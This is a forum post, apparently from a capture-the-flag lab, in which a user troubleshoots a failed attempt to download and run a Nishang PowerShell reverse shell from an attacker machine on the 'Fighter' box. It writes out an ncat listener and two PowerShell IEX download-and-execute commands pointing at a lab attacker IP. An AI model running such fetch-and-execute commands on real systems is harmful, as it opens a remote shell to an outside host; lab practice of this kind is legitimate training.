Fighter vm - reverse shell issue

Hello everyone,

I am trying to solve the vm but when it comes of using powershell to download the reverse shell from the attacker’s maching I keep getting the same issue: “Unable to connect to the remote server”. I tried several times in different way, doing some troobleshooting:

-Listener: ncat -lvnp 443 and python3 -m http.server 80
-checked my ip over the tun0 interface
-modified the reverse shell from nishang appending the line with ip and port of attacking maching as indicated in the tutorial
-tried to reach via powershell 64bit my maching by ping and it works correctly
-tried to reach the python webserver by browser and it works correctly
-tried to listen to 8000 instead of 80 (python http server)
-saved the rev.ps1 as REV.PS1 as indicated in the / folder (and i can see it via browser)
-tried to restart the machine
-tried to replace ‘http’ with HTTP in the powershell command:
c:\windows\syswow64\windowspowershell\V1.0\powershell “IEX(New-Object Net.WebClient).downloadString(‘HTTP://10.10.14.4/rev.ps1’)”
c:\windows\syswow64\windowspowershell\V1.0\powershell “IEX(New-Object Net.WebClient).downloadString(‘HTTP://10.10.14.4:8000/rev.ps1’)”

Could anyone help me to fix this issue?
Thank you all